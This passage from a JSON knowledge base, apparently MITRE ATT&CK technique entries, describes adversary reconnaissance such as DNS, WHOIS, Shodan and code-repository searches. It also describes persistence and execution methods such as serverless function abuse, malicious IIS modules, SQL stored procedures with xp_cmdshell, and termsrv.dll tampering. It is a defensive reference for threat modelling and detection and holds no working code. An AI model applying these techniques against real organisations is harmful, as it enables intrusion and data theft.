"description": "Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.<sup>[[D3Secutrity CTI Feeds](https://app.tidalcyber.com/references/088f2cbd-cce1-477f-9ffb-319477d74b69)]</sup> Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.<sup>[[ZDNET Selling Data](https://app.tidalcyber.com/references/61d00ae2-5494-4c6c-8860-6826e701ade8)]</sup>\n\nAdversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
},
{
"dest-uuid": "56ab198f-f8bb-4fe9-bd85-5975d4d3863b",
"type": "similar"
},
{
"dest-uuid": "a150a804-1a17-45aa-a49f-d65ee901ab59",
"type": "similar"
}
],
"uuid": "40e4133b-28c2-4da7-9a6a-7392ae87f1da",
"value": "Search Closed Sources"
},
{
"description": "Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestors geographical region.\n\nAdversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organizations website.<sup>[[DigitalShadows CDN](https://app.tidalcyber.com/references/183a070f-6c8c-46e3-915b-6edc58bb5e91)]</sup> Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1596.004"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "d8dcce33-3a7e-4a1c-95c6-afdcf2fa1df6",
"value": "CDNs"
},
{
"description": "Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.\n\nAdversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.<sup>[[SSLShopper Lookup](https://app.tidalcyber.com/references/a8dc493f-2021-48fa-8f28-afd13756b789)]</sup> Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).<sup>[[Medium SSL Cert](https://app.tidalcyber.com/references/6502425f-3435-4162-8c96-9e10a789d362)]</sup> Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1596.003"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "8f707326-d673-43ee-b269-4b6eca5b190a",
"value": "Digital Certificates"
},
{
"description": "Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a targets subdomains, mail servers, and other hosts.\n\nAdversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).<sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1596.001"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "758ad44d-5e29-4c7f-8dae-ddfeb5092ccb",
"value": "DNS/Passive DNS"
},
{
"description": "Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.<sup>[[Shodan](https://app.tidalcyber.com/references/a142aceb-3ef5-4231-8771-bb3b2dae9acd)]</sup>\n\nAdversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1596.005"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "b39cc340-ee1d-46a8-add2-f36aade56f15",
"value": "Scan Databases"
},
{
"description": "Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup>\n\nAdversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1596.002"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "ef55dc56-f2eb-4a3b-a271-3f73b4700c89",
"value": "WHOIS"
},
{
"description": "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup><sup>[[Medium SSL Cert](https://app.tidalcyber.com/references/6502425f-3435-4162-8c96-9e10a789d362)]</sup><sup>[[SSLShopper Lookup](https://app.tidalcyber.com/references/a8dc493f-2021-48fa-8f28-afd13756b789)]</sup><sup>[[DigitalShadows CDN](https://app.tidalcyber.com/references/183a070f-6c8c-46e3-915b-6edc58bb5e91)]</sup><sup>[[Shodan](https://app.tidalcyber.com/references/a142aceb-3ef5-4231-8771-bb3b2dae9acd)]</sup>\n\nAdversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
},
{
"dest-uuid": "d8dcce33-3a7e-4a1c-95c6-afdcf2fa1df6",
"type": "similar"
},
{
"dest-uuid": "8f707326-d673-43ee-b269-4b6eca5b190a",
"type": "similar"
},
{
"dest-uuid": "758ad44d-5e29-4c7f-8dae-ddfeb5092ccb",
"type": "similar"
},
{
"dest-uuid": "b39cc340-ee1d-46a8-add2-f36aade56f15",
"type": "similar"
},
{
"dest-uuid": "ef55dc56-f2eb-4a3b-a271-3f73b4700c89",
"type": "similar"
}
],
"uuid": "cf79ad1b-a82b-486b-88ad-e93bfc1c7439",
"value": "Search Open Technical Databases"
},
{
"description": "Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. \n\nAdversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.<sup>[[GitHub Cloud Service Credentials](https://app.tidalcyber.com/references/d2186b8c-10c9-493b-8e25-7d69fce006e4)]</sup> Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)). \n\n**Note:** This is distinct from [Code Repositories](https://app.tidalcyber.com/technique/fe595943-f264-4d05-a8c7-7afc8985bfc3), which focuses on [Collection](https://app.tidalcyber.com/tactics/1ca65327-b553-4923-ae19-8e6987ca250a) from private and internally hosted code repositories. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1593.003"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "2e4201da-fe83-439d-9d40-87e4c1f832fb",
"value": "Code Repositories"
},
{
"description": "Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).<sup>[[SecurityTrails Google Hacking](https://app.tidalcyber.com/references/3e7fdeaf-24a7-4cb5-8ed3-6057c9035303)]</sup><sup>[[ExploitDB GoogleHacking](https://app.tidalcyber.com/references/29714b88-a1ff-4684-a3b0-35c3a2c78947)]</sup>\n\nAdversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1593.002"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "62bc11f9-f88c-437a-98ae-e90def576e7e",
"value": "Search Engines"
},
{
"description": "Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.\n\nAdversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victims into revealing specific information (i.e. [Spearphishing Service](https://app.tidalcyber.com/technique/7f953df5-c91f-4975-a579-2be3c89bca7e)).<sup>[[Cyware Social Media](https://app.tidalcyber.com/references/e6136a63-81fe-4363-8d98-f7d1e85a0f2b)]</sup> Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Spearphishing via Service](https://app.tidalcyber.com/technique/165ba336-3eab-4809-b6fd-d0dcc5478f7f)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1593.001"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "d97c3d34-1210-4c71-b305-59dcccab8f45",
"value": "Social Media"
},
{
"description": "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.<sup>[[Cyware Social Media](https://app.tidalcyber.com/references/e6136a63-81fe-4363-8d98-f7d1e85a0f2b)]</sup><sup>[[SecurityTrails Google Hacking](https://app.tidalcyber.com/references/3e7fdeaf-24a7-4cb5-8ed3-6057c9035303)]</sup><sup>[[ExploitDB GoogleHacking](https://app.tidalcyber.com/references/29714b88-a1ff-4684-a3b0-35c3a2c78947)]</sup>\n\nAdversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
},
{
"dest-uuid": "2e4201da-fe83-439d-9d40-87e4c1f832fb",
"type": "similar"
},
{
"dest-uuid": "62bc11f9-f88c-437a-98ae-e90def576e7e",
"type": "similar"
},
{
"dest-uuid": "d97c3d34-1210-4c71-b305-59dcccab8f45",
"type": "similar"
}
],
"uuid": "f2d216e3-43d6-4a2e-aa5b-d6be78d018b6",
"value": "Search Open Websites/Domains"
},
{
"description": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://app.tidalcyber.com/technique/2eee984c-ea00-4284-b3eb-fd0c603a5a80)). These sites may also have details highlighting business operations and relationships.<sup>[[Comparitech Leak](https://app.tidalcyber.com/references/fa0eac56-45ea-4628-88cf-b843874b4a4d)]</sup>\n\nAdversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "c55c0462-d59f-4bd8-9728-05cf711917b0",
"value": "Search Victim-Owned Websites"
},
{
"description": "Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. \n\nAdversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://app.tidalcyber.com/technique/d10c4a15-aeaa-4630-a7a3-3373c89a584f)).<sup>[[Cado Security Denonia](https://app.tidalcyber.com/references/584e7ace-ef33-423b-9801-4728a447cb34)]</sup> Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1) to a serverless cloud function, which may then be able to perform actions the original user cannot.<sup>[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]</sup><sup>[[Rhingo Security Labs GCP Privilege Escalation](https://app.tidalcyber.com/references/55373476-1cbe-49f5-aecb-69d60b336d38)]</sup>\n\nServerless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://app.tidalcyber.com/technique/e1e42979-d3cd-461b-afc4-a6373cbf97ba)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://app.tidalcyber.com/technique/0799f2ee-3a83-452e-9fa9-83e91d83be25) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.<sup>[[Backdooring an AWS account](https://app.tidalcyber.com/references/2c867527-1584-44f7-b5e5-8ca54ea79619)]</sup> Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.<sup>[[Varonis Power Automate Data Exfiltration](https://app.tidalcyber.com/references/16436468-1daf-433d-bb3b-f842119594b4)]</sup><sup>[[Microsoft DART Case Report 001](https://app.tidalcyber.com/references/bd8c6a86-1a63-49cd-a97f-3d119e4223d4)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Office 365",
"SaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "d9edb609-2ca3-43d1-9c4d-c09a2856230f",
"value": "Serverless Execution"
},
{
"description": "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.<sup>[[Microsoft ISAPI Extension Overview 2017](https://app.tidalcyber.com/references/d00a692f-b990-4757-8acd-56818462ac0c)]</sup><sup>[[Microsoft ISAPI Filter Overview 2017](https://app.tidalcyber.com/references/2fdbf1ba-0480-4d70-9981-3b5967656472)]</sup><sup>[[IIS Backdoor 2011](https://app.tidalcyber.com/references/fd450382-cca0-40c4-8144-cc90a3b0011b)]</sup><sup>[[Trustwave IIS Module 2013](https://app.tidalcyber.com/references/cbb79c3c-1e2c-42ac-8183-9566ccde0cd6)]</sup>\n\nAdversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.<sup>[[Microsoft ISAPI Filter Overview 2017](https://app.tidalcyber.com/references/2fdbf1ba-0480-4d70-9981-3b5967656472)]</sup><sup>[[Microsoft ISAPI Extension Overview 2017](https://app.tidalcyber.com/references/d00a692f-b990-4757-8acd-56818462ac0c)]</sup><sup>[[Microsoft ISAPI Extension All Incoming 2017](https://app.tidalcyber.com/references/7d182eee-eaa8-4b6f-803d-8eb64e338663)]</sup><sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup><sup>[[Trustwave IIS Module 2013](https://app.tidalcyber.com/references/cbb79c3c-1e2c-42ac-8183-9566ccde0cd6)]</sup><sup>[[MMPC ISAPI Filter 2012](https://app.tidalcyber.com/references/ef412bcd-54be-4972-888c-f5a2cdfb8d02)]</sup>\n\nAdversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports <code>RegisterModule</code>, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.<sup>[[Microsoft IIS Modules Overview 2007](https://app.tidalcyber.com/references/c8db6bfd-3a08-43b3-b33b-91a32e9bd694)]</sup><sup>[[Trustwave IIS Module 2013](https://app.tidalcyber.com/references/cbb79c3c-1e2c-42ac-8183-9566ccde0cd6)]</sup><sup>[[ESET IIS Malware 2021](https://app.tidalcyber.com/references/d9c6e55b-39b7-4097-8ab2-8b87421ce2f4)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1505.004"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "e4495b87-9b04-4313-b771-7d9703639cce",
"value": "IIS Components"
},
{
"description": "Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).\n\nAdversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.<sup>[[NetSPI Startup Stored Procedures](https://app.tidalcyber.com/references/afe89472-ac42-4a0d-b398-5ed6a5dee74f)]</sup><sup>[[Kaspersky MSSQL Aug 2019](https://app.tidalcyber.com/references/569a6be3-7a10-4aa4-be26-a62ed562a4ce)]</sup> To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.<sup>[[NetSPI Startup Stored Procedures](https://app.tidalcyber.com/references/afe89472-ac42-4a0d-b398-5ed6a5dee74f)]</sup><sup>[[Kaspersky MSSQL Aug 2019](https://app.tidalcyber.com/references/569a6be3-7a10-4aa4-be26-a62ed562a4ce)]</sup><sup>[[Microsoft xp_cmdshell 2017](https://app.tidalcyber.com/references/1945b8b2-de29-4f7a-8957-cc96fbad3b11)]</sup> \n\nMicrosoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).<sup>[[Microsoft CLR Integration 2017](https://app.tidalcyber.com/references/83fc7522-5eb1-4710-8391-090389948686)]</sup> Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.<sup>[[NetSPI SQL Server CLR](https://app.tidalcyber.com/references/6f3d8c89-9d5d-4754-98d5-44fe3a5dd0d5)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1505.001"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "35197aee-8cc9-4584-bd22-33c8885db669",
"value": "SQL Stored Procedures"
},
{
"description": "Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.<sup>[[Microsoft Remote Desktop Services](https://app.tidalcyber.com/references/a981e013-f839-46e9-9c8a-128c4897f77a)]</sup>\n\n[Windows Service](https://app.tidalcyber.com/technique/31c6dd3c-3eb2-46a9-ab85-9e8e145810a1)s that are run as a \"generic\" process (ex: <code>svchost.exe</code>) load the service's DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.<sup>[[Microsoft System Services Fundamentals](https://app.tidalcyber.com/references/25d54a16-59a0-497d-a4a5-021420da8f1c)]</sup> The <code>termsrv.dll</code> file, typically stored in `%SystemRoot%\\System32\\`, is the default <code>ServiceDll</code> value for Terminal Services in `HKLM\\System\\CurrentControlSet\\services\\TermService\\Parameters\\`.\n\nAdversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.<sup>[[James TermServ DLL](https://app.tidalcyber.com/references/5a9e4f0f-83d6-4f18-a358-a9ad450c2734)]</sup> Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.<sup>[[Windows OS Hub 